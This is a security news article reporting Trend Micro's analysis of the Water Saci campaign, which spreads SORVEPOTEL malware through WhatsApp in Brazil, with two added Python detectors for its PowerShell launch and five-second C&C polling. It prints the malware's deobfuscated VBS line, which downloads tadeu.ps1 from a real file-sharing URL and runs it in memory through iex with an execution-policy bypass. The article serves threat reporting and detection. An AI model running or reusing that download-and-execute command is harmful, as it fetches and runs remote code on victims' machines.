Cyber Security News

Water Saci Hackers Leverage WhatsApp to Deliver Multi-Vector Persistent SORVEPOTEL Malware

A sophisticated malware campaign targeting Brazilian users has emerged with alarming capabilities.

The Water Saci campaign, identified by Trend Micro analysts as leveraging the SORVEPOTEL malware, exploits WhatsApp as its primary distribution vector for rapid propagation across victim networks.

First identified in September 2025, the campaign evolved dramatically by October 2025, introducing a new script-based attack chain that diverges significantly from previously observed .NET-based methods.

The malware demonstrates remarkable resilience through multi-vector persistence mechanisms and advanced command-and-control infrastructure that grants attackers unprecedented real-time operational control over compromised systems.

Trend Micro analysts identified that the campaign automatically distributes malicious ZIP files to all contacts and groups associated with compromised WhatsApp accounts, creating exponential spread potential.

On October 8, 2025, researchers revealed file downloads originating from WhatsApp web sessions, specifically identifying files named Orcamento-2025*.zip.

Rather than employing traditional .NET binaries, the evolved chain orchestrates payload delivery through a combination of Visual Basic Script downloaders and PowerShell scripts, facilitating fileless execution that evades conventional security detection methods.

The infection mechanism begins when users download and extract malicious ZIP archives containing an obfuscated VBS downloader named Orcamento.vbs.

New Water Saci attack chain observed (Source – Trend Micro)

This component executes a PowerShell command that performs fileless execution via New-Object Net.WebClient, downloading and executing the PowerShell script tadeu.ps1 directly in memory.

The deobfuscated code reveals:

shell.Run "powershell -ep bypass ""[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;iex ((New-Object Net.WebClient).DownloadString('https://cld.pt/dl/download/ac23c304-aa9d-4d27-a845-272ec4de533d/sapotransfer-640a60194938bL1/tadeu.ps1?download=true'))"", 0, True
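The launch pattern above (a script host spawning PowerShell with an execution-policy bypass, a TLS 1.2 pin, Net.WebClient.DownloadString and iex) is what a process-creation rule can key on. The detector below is an added example, not Trend Micro's code; the event records are constructed to resemble Sysmon Event ID 1 fields, and the URL in them is a placeholder.

```python
"""Flag the VBS -> fileless PowerShell launch described above from
process-creation events. Added example; sample events are constructed."""
import re

# Indicators taken from the deobfuscated command on the page.
INDICATORS = {
    "exec_policy_bypass": re.compile(r"-e(p|xecutionpolicy)\s+bypass", re.I),
    "webclient_download": re.compile(r"New-Object\s+Net\.WebClient.*DownloadString", re.I | re.S),
    "invoke_expression": re.compile(r"\b(iex|Invoke-Expression)\b", re.I),
    "tls12_pin": re.compile(r"SecurityProtocolType\]::Tls12", re.I),
}

def score_event(event: dict) -> list:
    """Return the indicator names matched by one process-creation event."""
    hits = []
    image = event.get("Image", "").lower()
    parent = event.get("ParentImage", "").lower()
    cmd = event.get("CommandLine", "")
    if not image.endswith("powershell.exe"):
        return hits
    # wscript/cscript spawning PowerShell matches the Orcamento.vbs stage.
    if parent.endswith(("wscript.exe", "cscript.exe")):
        hits.append("script_host_parent")
    hits += [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    return hits

def is_suspicious(event: dict, threshold: int = 3) -> bool:
    """Alert when at least `threshold` indicators co-occur in one event."""
    return len(score_event(event)) >= threshold

# Constructed sample events (placeholder URL, not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": ("powershell -ep bypass \"[Net.ServicePointManager]::SecurityProtocol="
                     "[Net.SecurityProtocolType]::Tls12;iex ((New-Object Net.WebClient)"
                     ".DownloadString('https://example.invalid/tadeu.ps1'))\"")},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell -File C:\scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(is_suspicious(ev), score_event(ev))
```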

Email-Based Command Infrastructure and Advanced Persistence

The SORVEPOTEL backdoor implements a sophisticated dual-channel communication architecture that fundamentally distinguishes it from conventional banking trojans.

Rather than relying on traditional HTTP-based command-and-control systems, the malware leverages IMAP connections to terra.com.br email accounts using hardcoded credentials to retrieve operational commands.

This email-based infrastructure provides remarkable resilience, allowing threat actors to maintain control even when primary C&C servers face disruption.

The backdoor establishes persistence through registry modifications and a scheduled task that runs WinManagers.vbs from C:\ProgramData\WindowsManager\. It then queries the email inbox every thirty minutes to extract several types of URLs: primary data endpoints, backup infrastructure URLs, and PowerShell payload delivery links.

The malware employs an HTTP-based polling system as its secondary communication channel, sending POST requests to extracted C&C servers every five seconds with the action parameter get_commands.

This multi-layered approach ensures operators can pause, resume, and monitor campaign activity in real time, effectively converting infected machines into a coordinated botnet.

The backdoor executes over twenty distinct commands, ranging from system information gathering and process management to screenshot capture, file operations, and system power control. This command set grants attackers comprehensive remote access and positions SORVEPOTEL as a full-featured backdoor with sophisticated operational flexibility and devastating potential for financial institutions and enterprises across Brazil.
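The fixed five-second POST polling with action=get_commands described above is a regular beacon, which is detectable from proxy logs even when the C&C host itself is unknown. The beacon finder below is an added example, not Trend Micro's code; the log format, host names and addresses are constructed placeholders.

```python
"""Find hosts that POST action=get_commands at a steady ~5 s cadence,
the SORVEPOTEL polling channel described above. Added example; the
proxy log lines are constructed and the host names are placeholders."""
import re
from collections import defaultdict
from datetime import datetime
from statistics import median, pstdev
from urllib.parse import urlsplit, parse_qs

# Constructed proxy log format: <iso timestamp> <src ip> <method> <url>
LOG_RX = re.compile(r"^(\S+) (\S+) (GET|POST) (\S+)$")
PROXY_LOG = """\
2025-10-08T12:00:00 10.0.0.5 POST http://c2.example.invalid/api?action=get_commands
2025-10-08T12:00:05 10.0.0.5 POST http://c2.example.invalid/api?action=get_commands
2025-10-08T12:00:10 10.0.0.5 POST http://c2.example.invalid/api?action=get_commands
2025-10-08T12:00:15 10.0.0.5 POST http://c2.example.invalid/api?action=get_commands
2025-10-08T12:00:20 10.0.0.5 POST http://c2.example.invalid/api?action=get_commands
2025-10-08T12:00:03 10.0.0.7 GET http://intranet.example.invalid/news
2025-10-08T12:07:41 10.0.0.7 POST http://intranet.example.invalid/search?action=get_commands
""".splitlines()

def find_beacons(lines, period=5.0, jitter=1.0, min_hits=4):
    """Group get_commands POSTs by (src, host) and report pairs whose
    inter-request gap is close to `period` seconds with low jitter."""
    series = defaultdict(list)
    for line in lines:
        m = LOG_RX.match(line)
        if not m:
            continue
        ts, src, method, url = m.groups()
        parts = urlsplit(url)
        if method != "POST" or "get_commands" not in parse_qs(parts.query).get("action", []):
            continue
        series[(src, parts.netloc)].append(datetime.fromisoformat(ts))
    beacons = []
    for key, stamps in series.items():
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        if len(gaps) + 1 < min_hits:  # too few requests to call it a cadence
            continue
        if abs(median(gaps) - period) <= jitter and pstdev(gaps) <= jitter:
            beacons.append((key, len(stamps), median(gaps)))
    return beacons

if __name__ == "__main__":
    for (src, host), n, gap in find_beacons(PROXY_LOG):
        print(f"{src} -> {host}: {n} get_commands POSTs, median gap {gap:.1f}s")
```

A single get_commands POST from 10.0.0.7 is ignored because the cadence check needs at least four requests, which keeps one-off application traffic from alerting.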


Tushar Subhra Dutta

Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics.
